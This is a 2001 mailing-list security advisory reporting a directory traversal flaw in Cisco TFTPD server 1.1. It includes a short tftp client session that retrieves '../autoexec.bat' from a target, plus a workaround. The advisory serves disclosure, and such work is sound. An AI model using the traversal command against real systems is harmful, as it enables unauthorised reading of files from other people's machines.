[Sentry Research Labs - ID0201061701] (c) 2001 by www.sentry-labs.com Note: This advisory is for information and educational purpouse only! We are not responsible for any abuse or damage resulting from these information. Author: Siberian Topic: Security Bug in CISCO TFTPD server 1.1 Vendor Status: Informed (06/17/01) Vendor URL: http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp Preamble: This software is some days old and I do not know if it is still supported, but it is a serious issue which should be reported. The bug itself is very common. Issue: TFTPD is vulnerable to some kind of primitve directory transversal attack which allows a remote user to obtain any file from the target system. Exploit (using tftp client (Linux)): tftp> connect target tftp> get ../autoexec.bat Recieved 218 bytes in 0.4 seconds tftpd> quit Workaround: Install your base directory at another partition or Hardrive (not c:)
This archive was generated by hypermail 2b30 : Mon Jun 18 2001 - 15:59:17 PDT